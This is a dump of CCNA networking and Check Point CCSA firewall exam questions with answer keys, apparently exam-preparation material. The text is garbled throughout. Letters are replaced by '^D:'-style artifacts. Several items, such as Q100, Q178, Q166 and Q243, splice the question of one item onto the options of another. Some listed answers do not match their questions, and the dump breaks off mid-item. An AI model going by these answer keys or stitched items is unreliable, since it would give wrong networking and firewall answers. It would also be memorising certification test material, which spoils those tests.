output from a telnet session, the ""terminal monitor"" command must be use^D:" "^C: If the ""logging buffered"" command is used, the debug output would be sent to RAM and can be viewed" "with the ""show log"" command." "^D: If the ""no console logging"" command were configured, output would be sent to a telnet session." ^E: All of the above. C #CCNA Q. 180 When you enter router password during the setup dialogue what is the difference between enable secret passwords? ^A: The enable password is encrypte^D: ^B: The enable secret password uses IPSec password authentication. ^C: The enable secret password cannot be seen as clear text when viewing the configuration. ^D: The enable secret password acts as a backup in case the enable password is compromise^D: C #CCNA Q. 3 When setting up Frame Relay for point-to-point subinterfaces, which of the following must not be ^A: The Frame Relay encapsulation on the physical interface ^B: The local DLCI on each subinterface ^C: An IP address on the physical interface ^D: The subinterface type as point-to-point B #CCNA Q. 272 What does IGRP use to determine the best path to a destination? ^A: The highest metric value. ^B: The lowest composite metric value. ^C: The lowest hop-count and delay. ^D: The highest bandwidth and reliability ^E: The lowest administrative distance. B #CCNA Q. 36 A routing table contains static, RIP, and IGRP routes for the same destination network. Which route would normally be used to forward data? ^A: The IGRP route. ^B: The static route: ^C: The RIP route. ^D: All three will load balance. B #CCNA Q. 155 When you use the Cisco ISO command show configuration on a router, which part of the output shows the specific configured IP addresses and subnet masks? ^A: The IP host table ^B: The interfaces output ^C: Each section of the output ^D: Each section of the output ^E: The global configuration statements ^F: The section under the autonomous system number D #CCNA Q. 117 Which statement is true when a broadcast is sent in an Ethernet/802.3 LAN? ^A: The IP subnet used is 255.255.255.0 ^B: The IP address used is 255.255.255.255 ^C: The MAC address used is 00-00-00-00-00-00 ^D: The MAC address used is FF-FF-FF-FF-FF-F^F: A,B,C #CCNA Q. 200 Which three pieces of CDP information about neighboring routers are displayed on your consoleterminal? (Choose three) ^A: The neighboring routers host name ^B: The neighboring routers hardware platform ^C: Up to one address for each protocol supported ^D: Up to two addresses for each protocol supported ^E: As many addresses as are configured for each protocol supporte^D: C #CCNA Q. 24 From the DOS command prompt, you are able to ping a router but are unable to telnet it. What is the most likely cause of the problem? ^A: The PC has a bad network interface car^D: ^B: The IP address of the router is on a different subnet. ^C: No password has been set on the router vty lines. ^D: The default gateway is not set on the P^C: ^E: The IP address of the workstation is incorrect. C #CCNA Q. 262 A new host has been connected to a workgroup switch. Although its Layer 3 configuration is correct, the host is unable to access the server resources on its network segment. What .s the likely cause of this problem? ^A: The router lacks a routing table entry for the new host. ^B: The host switch port is assigned to the incorrect VLAN. ^C: The host MAC address is incorrectly configure^D: ^D: A VTP instance for the new host has not been installe^D: B #CCNA Q. 78 What is not a characteristic of a network segment on a switch? ^A: The segment has its own collision domain. ^B: The segment can translate from one media to a different medi^A: ^C: All devices in the segment are part of the same broadcast domain. ^D: One device per segment can currently send frames to the switch. D #CCNA Q. 123 Switching methods include cut-through, store and forwarded and a modified version of the first two methods. Which statement about switching methods is true? ^A: The stored and forward method has low latency. ^B: The cut through method and switching has high latency. ^C: The modified version holds the packet in memory until 50% of the packet reaches the switch. ^D: The modified version holds the packet in memory until the data portion of the packet reaches the switch. A,B,D #CCNA Q. 18 You need to add a new VLAN, named ACCOUNTS, to your switched network. Which of the following are true regarding configuration of this VLAN? (Choose three) ^A: The VLAN must be create^D: ^B: The VLAN must be name^D: ^C: An IP address must be configured for the ACCOUNTS VLAN. ^D: The desired ports must be added to the new VLAN: ^E: The VLAN must be added to the STP domain. A,D #CCNA Q. 270 You have a Class B network address with a subnet mask of 255.255.255.0. Which of the following statements are true regarding the resulting network? (Choose two.) ^A: There are 254 usable hosts per subnet. ^B: There is one usable network. ^C: There are 255 usable hosts per subnet. ^D: There are 254 usable subnets. ^E: There are 30 usable subnets. ^F: There are 62 usable hosts per subnet. B #CCNA Q. 309 What is the purpose of DLCIs in Frame Relay? ^A: They determine the Frame Relay encapsulation type. ^B: They identify the logical circuit between a local router and a Frame Relay WAN switch. ^C: The represent the keepalives used to maintain the PVC in an active state. ^D: They represent the physical address of the router attached to a Frame Relay network. B,C,E #CCNA Q. 257 Which of the following are benefits of VLANs? (Choose three) ^A: They increase the size of collision domains. ^B: They allow logical grouping of users by function. ^C: They enhance network security. ^D: They increase the size of broadcast domains while decreasing the number of broadcast domains. ^E: They increase the number of broadcasts domain while decreasing their size. ^F: The simplify switch administration. D #CCNA Q. 250 What is the purpose of ISL and 802.lq frame tagging? ^A: They provide best path determination. ^B: The allow the exchange of filtering tables. ^C: They specify different implementation of the Spanning-Tree Protocol. ^D: They provide interswitch VLAN communication. D,E #CCNA Q. 152 What are two functions of ICMP protocol? (Choose Two) ^A: To map IP addresses to Ethernet addresses ^B: To map common names to network addresses ^C: To forward SNMP alerts to management consoles ^D: To generate an echo reply in response to a ping test ^E: To send a host or post unreachable message from a router to the source of an undeliverable packet B #CCNA Q. 128 What is a key use of a device hardware address? ^A: To obtain a vendor code/serial number from the user. ^B: To transmit a frame from one interface to another interface ^C: To transmit a packet from one local device to another local device. ^D: To transmit data from one local device to remote device across Internet. ^E: To contain logical information about a device to use an end-to-end transmission. C #CCNA Q. 251 What is the purpose of Spanning-Tree in a switched LAN? ^A: To provide a mechanism for network monitoring in switched environments. ^B: To prevent routing loops in networks with redundant paths. ^C: To prevent routing switching loops in networks with redundant switched paths. ^D: To manage, the addition, deletion, and naming of VLANs across multiple switches. ^E: To segment a network into multiple collision domains. B,E #CCNA Q. 294 Which of the following are reasons to use a bridge to segment a network? (Choose two.) ^A: To reduce broadcasts within collisions domains. ^B: To reduce collisions within broadcasts domain. ^C: To increase the number of broadcasts domains. ^D: To increase the broadcasts within collisions domains. ^E: To increase the number of collision domains. ^F: To increase the efficiency of routin^G: A,C #CCNA Q. 225 What are two purposes for using switches? (Choose two) ^A: To reduce collisions ^B: To increase collisions ^C: To increase the number of collision domains ^D: To decrease the number of collision domains ^E: To decrease the number of broadcast domains A,C #CCNA Q. 115 What are two purposes of segmenting a network with a bridge? (Choose two) ^A: To reduce collisions. ^B: To increase collisions. ^C: To add collision domains. ^D: To reduce collision domains. ^E: To have more broadcast domains. A,C,D,F #CCNA Q. 281 What are possible causes of LAN traffic congestion? (Choose four.) ^A: Too many hosts in a broadcast domain. ^B: Full Duplex operation. ^C: Broadcast storms. ^D: Multicastin^G: ^E: Segmentation. ^F: Low bandwidth. C #CCNA Q. 29 If windows size is changed from 3000 to 4000 during the data transfer stage of a TCP session, what can a sending host do? ^A: Transmit 3000 bytes before waiting for an acknowledgement. ^B: Transmit 4000 packets before waiting for an acknowledgement. ^C: Transmit 4000 bytes before waiting for an acknowledgement. ^D: Transmit 4000 segments before waiting for an acknowledgement. ^E: Transmit 3000 frames before waiting for an acknowledgement. A #CCNA Q. 203 The ICMP (referred to in RFC 1700) is implemented by all TCP/IP hosts? ^A: TRUE ^B: FALSE A #CCNA Q. 204 IPX traffic using different encapsulation types can go over the same datalink. ^A: TRUE ^B: FALSE D #CCNA Q. 182 How do you get help on a command after you have received - % INCOMPLETE COMMAND' response from a switch CLI? ^A: Type -history- to review the prompt before the error. ^B: Enter a question mark to display all console commands ^C: Type \ldblquote help\rdblquote followed by the command to see the command parameter ^D: Re enter the command followed by question mark to view key words A,B #CCNA Q. 209 In which two modes can the ICMP ping command be used? (Choose two) ^A: User ^B: Privileged ^C: Global Configuration ^D: Interface Configuration A #CCNA Q. 280 Question on PPP authentication. We have two Cisco routers with the hostnames Router1 and Router2. Router1 uses username Router2 and password PassRouter1. How would you set the username and password on Router2 for PPP authentication between Router1 and Router2? ^A: Username Router1 password PassRouter1 ^B: Username Router2 password PassRouter1 ^C: Username Router1 password PassRouter2 ^D: Username Router2 password PassRouter2 A #CCNA Q. 68 A router on one side of a PPP link uses the host name RTR1 and the password CORP1-PWD. Which configuration line on RTR1 enables the connection between RTR1 and other router named RTR2? ^A: Username RTR2 password CORP1-PWD ^B: Username RTR1 password CORP1-PWD ^C: Username RTR2 password CORP2-PWD ^D: Username RTR1 password CORP2-PWD B #CCNA Q. 220 What was the key reason the International Organization for Standardization released the OSI model? ^A: Users could access network server faster. ^B: Different vendors networks could work with each other. ^C: The industry could create a standard for how computers work. ^D: The network administrator could increase the overall speed of their network. D #CCNA Q. 124 Which technology do catalyst switches use to resolve topology loops and ensure data use flows properly through a single network path? ^A: Virtual LANs. ^B: Frame filterin^G: ^C: Cut through switchin^G: ^D: Spanning tree protocol. C,D,E,F #CCNA Q. 121 What are 4 ways network management can be simplified by using the virtual LANs (VLANs)? (Choose four) ^A: VLANs allow you to implement multiple layers switching easily. ^B: VLAN can group several broadcasts domains into multiple logical subnets. ^C: It is no longer necessary to install cables to move a user from a new network to another. ^D: Network adds, moves and changes are achieved by configuring a port into a VLAN. ^E: A group of users needing high security can be put into a VLAN so that no users outside the VLANs can communicate with them. ^F: As a logical grouping of users, VLANs can be considered independent from their physical or geographic locations. A,E,F #CCNA Q. 61 In which three situations is a hold-down timer reset? (Choose three:) ^A: When the hold-down timer expires. ^B: When infinity is finally defined as some maximum number. ^C: When the router exchanges update summaries at area borders. ^D: When the router detect faulty LSPs propagating through the internetwork. ^E: When another update is received indicating a new route with a better metri^C: ^F: When another update is received indicating the original route to the network has been restore^D: ^G: When the router receives a processing task proportional to the number of links in the internetwork. A #CCNA Q. 77 Which statement is true? ^A: While bridges are used to segment networks they will not isolate broadcast or multicast packets. ^B: A bridge looks at every packet with in its network segment and works like a hub, rebroadcasting the packet if the destination is with in its network segment. ^C: A bridge maintains a table of the IP addresses of the hosts with in its network segment and forwards the packet directly to the destination based upon the IP address. ^D: Bridge resets the hop count by keeping all packets within the network segment only packets addressed to its specific destination host outside the network segment are allowed to pass through the bridge.: A #CCNA Q. 187 Which statement about half-duplex Ethernet operation is true? ^A: With half duplex transmission frames feed into a single cable in one direction at a time. ^B: Half duplex transmission between stations is achieved by using point-to-point Ethernet and fast Ethernet connection. ^C: Half duplex transmission between stations is achieved by using point to multi point Ethernet and fast Ethernet connection. ^D: Half duplex Ethernet technology provides a transmit circuit connection wired directly to the receiver circuit at the other end of the connection. C #CCNA Q. 297 Company ABC has just added an employee workstation to its network. The employee is unable to connect to the server at IP address 192.168.10.98/27. Identify the incorrectly configured network parameter. ^A: workstation IP address. ^B: workstation subnet mask. ^C: workstation default gateway. ^D: router interface E0 IP address. D #CCNA Q. 278 Which WAN technology was designed to work over traditional phone lines and provide small offices and user with higher speed digital dial-up service? ^A:frame relay . x.25 ^C: ATM ^D: ISDN B,F #CCNA Q. 34 Given the following routing table entry, which of the following are used by default in the calculation of the number 1200? (Choose two.) 172.16.0.0 [100/1200] via 192.168.16.3, 00:00:55, Ethernet1 ^A: MTU ^B: bandwidth ^C: administrative distance ^D: hop count ^F: delay A #CCNA Q. 73 Which statement about the specialized IP addresses shown in the EXHIBIT is true? EXHIBIT: 10.0.0.0 to 10.255.255.255 172.16.0.0 to 172.31.255.255 192.168.0.0 to 192.168.255.255 ^A: They are private IP addresses. ^B: They can not be leased with DHCP. ^C: They are allocated for VOL PVOLP. ^D: They represent IP classless addresses. ^E: They are used by the inter NIC for administration. C #CCNA Q. 136 Given the following IP address from the Class B address range: 172.35.21.12 Your network plan requires no more than 126 hosts on a subnet that includes this address. When you configure the IP address in Cisco IOS software, which value should you use as the subnet mask? ^A: 255.255.0.0 ^B: 255.255.128.0 ^C: 255.255.255.128 ^D: 255.255.255.252 A #CCNA Q. 197 Company XYZ has an employee that works out of the home. The employee runs big client-server applications and must quickly transfer large files. The company wants the best cost/benefit on this connection. What would be the most practical solution? ^A: An ISDN basic rate interface (BRI) connection to the users home . ^B: A dedicated T1 connection to the users home. ^C: A dedicated Frame Relay connection to the users home. ^D: A standard 28.8 analogue dial up connection to the users home D #CCNA Q. 193 Given the following criteria for granting access from a remote site to your LAN : restrict access on interface E0 E0=128.12.22.55 Deny access to telnet, FTP All other types of operations. Which line should come last in configuring your access list? ^A: Access-List 101 ^B: Access-List 101 deny E0 telnet FTP ^C: Access list 101 allow all except FTP telnet ^D: Access list 101 permit IP 0.0.0.0 255.255.255.255 any E #CCNA Q. 163 Which line from a show spantree one-command output indicates that Virtual LAN1 (VLAN1) is functioning properly? ^A: Root mode is fast Ethernet 0/26. ^B: Port Ethernet 0/1 of VLAN is forwardin^G: ^C: Designated port in Ethernet 0/1 path cos10. ^D: Designated root has priority 0, address 0000.588fb600 ^E: VLAN1 is executing the IEEE compatible spanning tree protocol. B #CCNA Q. 221 Each department has its own file server and the company has an enterprise server that is shared by all departments. What does a network administrator use to provide a secure separation between the management and sales department? ^A: Bridge between management and sites. ^B: Routers to provide the most secure segmentation. ^C: A hub to provide the ease of management and a satisfactory alternative for the network security. ^D: An Ethernet switch to secure separation through programming the access list of each port of the switch. D #CCNA Q. 153 Novell IPX network addresses have two configurable parts. The network administrator specifies the IPX network number. How is the node number determined? ^A: It is the serial number of the given device. ^B: It is assigned as a lease by Novell DHCP. ^C: It is also set by the network administrator. ^D: It is usually the MAC address of one interface. ^E: It is downloaded by NetWare Core Protocol (NCP). B #CCNA Q. 30 Users on network 192.168.69.0/28 are complaining that they cannot access the corporate intranet server at www.inhouse:com. In troubleshooting this problem, you find that you are able to telnet a workstation on this network to the internal webserver via its IP address. What is the likely cause of this problem? Other divisions in the company use applications that require less than 2 Mbps bandwidth of the enterprise server ^A: TCP/IP failure ^B: DNS failure ^C: FTP failure C #CCNA Q. 100 On a network design project you determine that a new testing application requires multiple hosts. These hosts must be capable of sharing data between each host and an enterprise server at 10 Mbps bandwidth. system image that is run in Flash? ^A: Copy flash tftp What is your economical recommendation? ^A: That the existing 10BaseT hub be replaced with 100BaseT hub to improve overall performance. ^B: That a router can separate the testing application from the rest of the network thus allowing the testing application more bandwidth. ^C: That the switch be installed so that enterprise server can be provided a 100 Mbps port and each of the testing application hosts can be given dedicated 10 Mbps ports. A #CCNA Q. 178 Which command should you use to configure a router so that it can become a TFTP host for router transmission session on the other device are successful. What is the default that you must enter to suspend your Telnet session and return to the original router? ^B: Config tftp server ^C: Write network ^D: Tftp-server system ^E: Setup server tftp E #CCNA Q. 166 While you are preparing the initial configuration of your router and enable IP you find that you need to use a telnet session to check for a network address parameter. Your telnet logging and your virtual Which layer of the protocol stack is the network administrator using for this operation? ^A: application ^A: Suspend ^B: The command exit ^C: CTRL \endash ESC followed by x ^D: CTRL \endash ALT \endash DEL followed b ESC ^E: CTRL- Shift-6 followed by x A #CCNA Q. 243 A network administrator is verifying the configuration of a newly installed host by establishing an ftp connection to a remote server. Which of the following are required to allow remote management of the switch over IP? (Choose two.) ^A: The Frame Relay encapsulation on the physical interface. ^B: presentation ^C: session ^D: transport ^E: data link ^F: internet C #CCNA Q. 234 You are configuring a new catalyst switch that you want to manage remotely from workstations on other network segment within your enterprise. you configure for 5 bits of subnetting when you configure for this in the Cisco IOS software. Which subnet mask should you use? ^B: The local DLCI on each subinterface. ^C: An IP address on the physical interface. ^D: The subinterface type as point-to-point D #CCNA Q. 219 Given the following IP address from the class C address range 192.168.21.12 your network plan needs addresses for twenty-eight small offices. Each office uses its own subnet. The network designs specify that ^A: 255.255.0.28 ^B: 255.255.255.0 ^C: 255.255.255.28 ^D: 255.255.255.248 ^E: 255.255.255.252 4ad1.021f.2cfe.8322 #CCNA Q. 39: A host with a MAC address of 021f.2cfe.8322 is to be inserted into IPX network 4ad1. Enter the IPX address for this host. 255.255.255.224 #CCNA Q. 264 A small enterprise has a class C network license The enterprise requires five usable subnets, each capable of accommodating at least 18 hosts. Enter the appropriate subnet mask below. 255.255.255.224 #CCNA Q. 311 A small enterprise has class C network license The enterprise requires 5 usable subnets, each capable of accommodating at least 18 hosts. Enter the appropriate subnet mask below. router rip #CCNA Q. 232 Enter the command to start IP, RIP version1 routing on a Cisco router? DECIMAL:170 HEXADECIMAL:AA #CCNA Q.315 What is the decimal and hexadecimal equivalent of the binary number 10101010? D #CCNA Q. 1: Your Ethernet network, 172.30.1.0, shuts down. Which update message is seen in your router's debug ip rip output regarding that network?^A: subnet 172.30.1.0,metric 0 ^B: subnet 172.30.1.0, metric 1 ^C: subnet 172.30.1.0, metric 15 ^D: subnet 172.30.1.0, metric A #CCSA Q1. The VPN1 NG User Interface consists of which of the following elements? ^A. Security Policy Editor, Visual Policy Editor and Object tree view. ^B. Management Server and VPN1 Module. ^C. Visual Policy Editor, Object Tree view and inspection Module. ^D. Security Policy Server, System GUI and Module Log Viewer. ^E. VPN1 Module, Inspection Module and Security Server. A #CCSA Q3. As a VPN1 administrator, you have an undistributed range of IP addresses for which you want to perform address translation. You can simplify your efforts through the use of ADDRESS RANGE. ^A. True ^B. False D #CCSA Q5. You are working with multiple firewalls that have extensive Rule Bases. To simplify administration task, which of the following should you choose to do? ^A. Create Network range objects that restrict all applicable rules to only certain networks. ^B. Run separate GUI clients for external and internal firewalls. ^C. Eliminate all possible contradictory rules such as stealth and clean-up rules. ^D. Save a different Rule Base for each remote firewall. ^E. None of the above. B #CCSA Q6. Currently, the Accounting Department is FTP-ing a file in the bank. Which Log Viewer Module would show you the activity occurring at the present time? ^A. Security Log. ^B. Active Connections Log. ^C. Accounting Log- ^D. Administrative Log. ^E. None of the above. A #CCSA Q7. With Blocking Scope default settings, a selected connection is terminated: ^A. And all further attempts to establish a connection from the same source IP address to the same destination IP address and port will be blocked. ^B. But all further attempts to establish connections from this specific source IP address will be authenticated before being denied. ^C. And all further attempts to establish connections to this specific destination IP address will be denied. ^D. And all further attempts to establish a connection from the same source IP address to the firewall's IP address will be blocked. ^E. Both A and D. C #CCSA Q11. Changes made to the Security Policy do not take effect on the Enforcement Module until the administrator performs which of the following actions? ^A. Saves the policy. ^B. Verifies the policy. ^C. Install the policy. ^D. Stops firewall services on the Enforcement Module. ^E. Stops firewall services on the Management module. A #CCSA Q13. The fw fetch command perform the following function: ^A. Attempts to fetch the policy from the Management Server. ^B. Fetches users from the Management server. ^C. Produces an output screen of the Rule Base. ^D. Fetches the logs. ^E. Fetches the systems status. E #CCSA Q14. Inclement weather and a UPS-failure cause a firewall to reboot. ^ Earlier that day a tornado destroyed the building where the firewall's Management Module was located. ^ The Management Module was not recovered and has not been replaced. ^ Bases on the scenario, which of the following statements is FALSE? ^A. The firewall will continue to enforce the last rule base installed. ^B. The firewall will log locally. ^C. The firewall will fetch the last installed policy form local host and install it. ^D. Communication between the firewall and the replacement Management Module must be established before the replacement Management Module can install a policy on the firewall. ^E. Because the firewall cannot contact the Management Module, no policy will be installed. C #CCSA Q15. When configuring Anti1 NG on the firewall interfaces, all of the following are valid address choices except: ^A. Network defined by Interface IP and Net Mask. ^B. Not Defined. ^C. Security Policy Installed. ^D. Specific ^E. None of the above. C #CCSA Q17. Assume that you are working on a Windows NT operating system. What is the default expiration for a Dynamic NAT connection NOT showing any UDP activity? ^A. 30 Seconds. ^B. 60 Seconds. ^C. 40 Seconds. ^D. 600 Seconds. ^E. 3000 Seconds. B #CCSA Q18. Assume there has been no change made to default policy properties. ^ To allow a telnet connection into your network, you must create two rules. ^ - One to allow the initial Telnet connection in. ^ - One to allow the destination machine to send information back to the client. ^A. True ^B. False E #CCSA Q19. In Windows NT to force log entries other than the default directory. ^A. You must use the cpconfig command. ^B. Change the fwlog environment variable. ^C. Modify the registry. ^D. Change the directory in log viewer. ^E. Use the fw log switch command. A #CCSA Q20. For most installations, the Clean-Up rule should be the last rule in Rule Base. ^A. True ^B. False B #CCSA Q21. What complements are necessary for VPNmail, passing through the firewall, for macro viruses? ^A. UFP and OPSEC-certified scanning product. ^B. CVP and OPSEC-certified virus scanning product. ^C. UFP and CVP. ^D. UFP, CVP and OPSEC-certified content filter. ^E. None of the above, VPN1 NG scans for macro viruses by default. C #CCSA Q22. Why would you want to verify a Security Policy before installation? ^A. To install Security Policy cleanly. ^B. To check up the enforcement-point firewall for errors. ^C. To identify conflicting rules in your Security Policy. ^D. To compress the Rule Base for faster installation ^E. There us no benefit verifying a Security Policy before installing it. B #CCSA Q23. To completely setup Static NAT, you ONLY have to select Add Automatic Address Translation rules on the NAT tab, and specify a public NAT IP address. ^A. True ^B. False B #CCSA Q24. If you configure the Minutes interval for a firewall in the User Authentication session timeout box, as shown below on the Authentication Tab of the Workstations properties window, users of one time password must re-authenticate for each request during this time period. ^A. True ^B. False D #CCSA Q25. What does a status of Untrusted tell you? ^A. A VPN1 NG firewall module has been compromised. ^B. A gateway cannot be reached. ^C. A module is installed and responding to status checks, but the status is problematic. ^D. A gateway is connected, but the management module is not the master of the module installed on the gateway. ^E. None of the above. D #CCSA Q29. How do recover communications between your management module and enforcement module if you lock yourself out via a rule policy that is configured incorrectly? ^A. Cp delete all all. ^B. Cp pause all all. ^C. Cp stop all all. ^D. Cp unload all all. ^E. Cp push all all. C #CCSA Q30. You have set up a firewall and management module on one NT box and a remote module on a different location. ^ You receive only sporadic logs from the local firewall and only and control message from remote firewall. ^ All rules on both firewalls are logging and you know the traffic is flowing through the firewall using these rules. ^ All the firewall related services are running and you are using NAT and you receive few logs from the local firewall. ^ What actions from the choices below would you perform to find out why you cannot see logs? ^A. Make sure there is no masters file in SFWDIR/conf on the remote module. ^B. Make sure there is no masters file in SFWDIR/conf on the local NT box. ^C. See if you can do a fwfetch from the module. ^D. Run the fw logexport n from the command line prompt on the remote module. ^E. Use pulist.exe from the Windows NT resource kit. B #CCSA Q31. As a firewall administrator you encounter the following error message: ""Authentication for command failed."" ^ What is the most logical reasoning for this type of error message? ^A. The Rule Base has been corrupted. ^B. The kernel cannot communicate with the management module. ^C. The administrator does not have the ability to push the policy. ^D. Remote encryption keys cannot be fetched. ^E. Client authentication has failed. " A #CCSA Q32. Your customer has created a rule so that every time a user wants to go to the Internet, that user must be authenticated. ^ Firewall load is a concern for the customer. ^ Which authentication method does not result in any additional connections to the firewall? ^A. Session ^B. User ^C. Client ^D. Connection ^E. None of the above. D #CCSA Q33. What variable is used to extend the interval of the Timeout in a NAT to prevent a hidden UDP connection from losing its port? ^A. Fwx_udp_todefaultextend. ^B. Fwx_udp_expdefaultextend. ^C. Fwx_udp_todefaultext ^D. Fwx_udp_timeout. ^E. Fwx_udp_expiration. D #CCSA Q34. To hide data filed in the log viewer: ^A. Select Hide from the Log Viewer menu. ^B. Right-click anywhere in a column of the Log Viewer GUI and select Show Details. ^C. Right-click anywhere in the column of the Log Viewer GUI and select Disable. ^D. Right-click anywhere in the column of the Log Viewer GUI and select Hide. ^E. Select Hide from the Log Viewer tool bar. D #CCSA Q35. You are following the procedure to setup user authentication for TELNET to prompt for a distinct destination. ^ This allows the firewall to simulate a TELNET Proxy. ^ After you defined the user on the Firewall and use VPN1 Authentication, you would: ^A. Stop the Firewall. ^B. Restart the Firewall. ^C. Start the Policy Editor and go to Manage service, and edit TELNET service. ^D. Ensure that the Authentication method is enabled in the firewall object. ^E. Ensure that there are no existing rules already allowing TELNET. E #CCSA Q37. What is the software package through which all Check Point products use infrastructure services? ^A. Cpstart/cpstop. ^B. Check Point Registry. ^C. CPD ^D. Watch Dog for critical services. ^E. SVN Foundation. A #CCSA Q38. Choose the BEST response to finish this statement. ^ A Firewall: ^A. Prevents unauthorized to or from a secured network. ^B. Prevents unauthorized to or from a unsecured network. ^C. Prevents authorized access to or from an Intranet. ^D. Prevents authorized access to or from an Internet. ^E. Prevents macro viruses from infecting the network. E #CCSA Q39. Where is the external if file located in VPN1/Firewall-1 NG? ^A. FWDIR conf directory. ^B. Database directory. ^C. State directory. ^D. Temp Directory. ^E. Not used in VPN1/Firewall-1 NG. E #CCSA Q40. Which log viewer mode allows you to actually see the contents of the files HTTP-ed by the corporation's Chief Executive Officer? ^A. Security Log. ^B. Active Connections Log. ^C. Accounting Log. ^D. Administrative Log. ^E. None of the above. E #CCSA Q41. When you select the alert radio button on the topology tab of the interface properties window: ^A. The action specified in the Action element of the Rule Base is taken. ^B. The action specified in the Anti-Spoofing Alert field in the Global properties window is taken. ^C. The action specified in the Pop up Alter Command in the Global properties window is taken. ^D. Both A and ^B. ^E. Both B and ^C. D #CCSA Q42. You are the firewall administrator with one management server managing one firewall. The system status displays a computer icon with a '!' symbol in the status column. ^ Which of the following is the most likely cause? ^A. The destination object has been defined as external. ^B. The Rule Base is unable to resolve the IP address. ^C. The firewall has been halted. ^D. The firewall is unprotected, no security policy is loaded. ^E. Nothing is wrong. B #CCSA Q43. System Administrators use session authentication when they want users to: ^A. Authenticate each time they use a supported service. ^B. Authenticate all services. ^C. Use only TENET, FTP, RLOGIN, and HTTP services. ^D. Authenticate once, and then be able to use any service until logging off. ^E. Both B and D B #CCSA Q44. Your customer has created a rule so that every time a user wants to go to Internet, that user must be authenticated. ^ The customer requires an authentication scheme that provides transparency for the user and granular control for the administrator. ^ User must also be able to log in from any location. ^ Based on this information, which authentication schemes meets the customer's needs? ^A. Session ^B. User ^C. Client ^D. Dual ^E. Reverse B #CCSA Q45. Implementing Dynamic NAT would enable an internal machine behind the firewall to act as an FTP Server for external clients. ^A. True ^B. False E #CCSA Q46. The Enforcement Module (part of the VPN1 Module): ^A. Examines all communications according to an Enterprise Security Policy. ^B. Is installed on a host enforcement point. ^C. Can provide authentication and Content Security features at the application level. ^D. Is usually installed on a multi-homed machine. ^E. All of the above. C #CCSA Q47. In most cases when you are building the Rule Base you should place the Stealth Rule above all other rules except: ^A. Clean up rules. ^B. Implicit Riles. ^C. Client Authentication Rules. ^D. Pseudo Rules. ^E. Default Rules. A #CCSA Q48. If you change the inspection order of any of the implied rules under the Security Policy Setup, does it change the order in which the rules are enforced? ^A. True ^B. False A #CCSA Q49. The fw fetch command allows an administrator to specify which Security Policy a remote enforcement module retrieves. ^A. True ^B. False B #CCSA Q50. You can edit VPE objects before they are actualized (translated from virtual network objects to real). ^A. True ^B. False. E #CCSA Q51. Stateful inspection is a firewall technology introduced in Checkpoint VPN1 software. It is designed to meet which of the following security requirements? ^ 1. Scan information from all layers in the packet. ^ 2. Save state information derived from previous communications, such as the outgoing Port command of an FTP session, so that incoming data communication can be verified against it. ^ 3. Allow state information derived from other applications access through the firewall for authorized services only, such as previously authenticated users. ^ 4. Evaluate and manipulate flexible expressions based on communication and application derived state information. ^A. 1, 2, 3 ^B. 1, 3, 4 ^C. 1, 2, 4 ^D. 2, 3, 4 ^E. 1, 2, 3, 4 A #CCSA Q52. If the security policy editor or system status GUI is open, you can open the log viewer GUI from the window menu. ^A. True ^B. False D #CCSA Q53. NAT can NOT be configured on which of the objects? ^A. Hosts ^B. Gateways ^C. Networks ^D. Users ^E. Routers C #CCSA Q54. Your customer has created a rule so that every user wants to go to Internet, that user must be authenticated. ^ Which is the best method of authentication for users who must use specific computers for Internet access? ^A. Session ^B. User ^C. Client ^D. Connection ^E. None of the above. B #CCSA Q55. Which of the following describes the behavior of VPN1 NG? ^A. Traffic not expressly prohibited is permitted. ^B. Traffic not expressly permitted is prohibited. ^C. TELNET, SMTP and HTTP are allowed by default. ^D. Secure connections are authorized by default, unsecured connections are not. ^E. All traffic is controlled by explicit rules. E #CCSA Q56. New users are created from templates. What is the name of the standard template from which you would create a new user? ^A. New ^B. User ^C. Group ^D. Standard User. ^E. Default B #CCSA Q57. In a distributed management environment, the firewall administrator has removed the default check from Accept VPN1 control connections under the Security Policy tab of the properties setup dialogue box. ^ In order for the management module and the Firewall to communicate, you must create a rule to allow the Management Module to communicate to the firewall on which port? ^A. 80 ^B. 256 ^C. 259 ^D. 900 ^E. 23 B #CCSA Q58. What is the command for installing a Security Policy from a *.W file? ^A. Fw gen and then the name of the .W file. ^B. Fw load and then the name of .W file. ^C. Fw regen and then the name of the .W file. ^D. Fw reload and then the directory location of the .W file. ^E. Fw import and then the name of the .W file. B #CCSA Q59. In the Check Point Configuration Too, you create a GUI administrator with Read Only privileges. ^ This allows the Firewall-1 administrator for the authorized GUI client (GUI workstation) privileges to change network object, and create and install rules. ^A. True ^B. False D #CCSA Q60. Hybrid Authentication allows VPN1 NG to authenticate SecuRemote/SecureClient, using which of the following? ^A. RADIUS ^B. 3DES ^C. TACACS ^D. Any authentication method supported by VPN1. ^E. Both A and C. E #CCSA Q61. In order to install a new Security Policy on a remote firewall, what command must be issued on the remote firewall? ^A. Fw unload all all. ^B. Fw load new. ^C. Cp clear policy. ^D. None of the above, the command cp policy remove is issued from the manager. ^E. None of the above, the new policy will automatically overwrite the existing policy. A #CCSA Q62. As a firewall administrator if you want to log packets dropped by ""implicit drop anything not covered"" rules, you must explicitly define a Clean-up rule. This must be the last rule in the rule base. ^A. True ^B. False A #CCSA Q63. Fully Automatic Client authentication provides authentication for all protocols, whether supported by these protocols or not. ^A. True ^B. False B #CCSA Q64. VPN1 NG differs from Packet filtering and Application Layer Gateways, because? ^A. VPN1 NG provides only minimal logging and altering mechanism. ^B. VPN1 NG uses Stateful inspection which allows packet to be examined at the top of the layers of the OSI model. ^C. VPN1 NG has access to a limited part of the packet header only. ^D. VPN1NG requires a connection from a client to a firewall and firewall to a server. ^E. VPN1 NG has access to packets passing through key locations in a network. A #CCSA Q65. AlphaBravo Corp has 72 privately addressed internal addresses. Each network is a piece of the 10-net subnetted to a class C address. ^ AlphaBravo uses Dynamic NAT and hides all of the internal networks behind the external IP addresses of the Fire C #CCSA Q66. How does VPN1 NG implement Transparent authentication? ^A. Unknown user receive error messages indicating that the firewalled gateway does not know the user names on the gateway. ^B. VPN1 NG prompts for user names even through the authentication data may not be recognized by the firewall's user database. ^C. VPN1 NG allows connections, but hides the firewall from authenticated users. ^D. Unknown users error messages indicating that the host does not know the users names on the server. ^E. VPN1 NG does not allow connections from users who do not know the name of the firewall. B #CCSA Q67. When creating user authentication rule, select intersect with user database for source and destination to allow access according to the source specified in the rules. ^A. True ^B. False C #CCSA Q69. Which if the following statements about Client Authentication are FALSE? ^A. In contrast to User Authentication, which allows access per user, Client Authentication allows access per ID address. ^B. Authentication is by user name and password, but is the host machine (client) that is granted access. ^C. Client Authentication is more secure than User Authentication, because it allows multiple users and connections from an 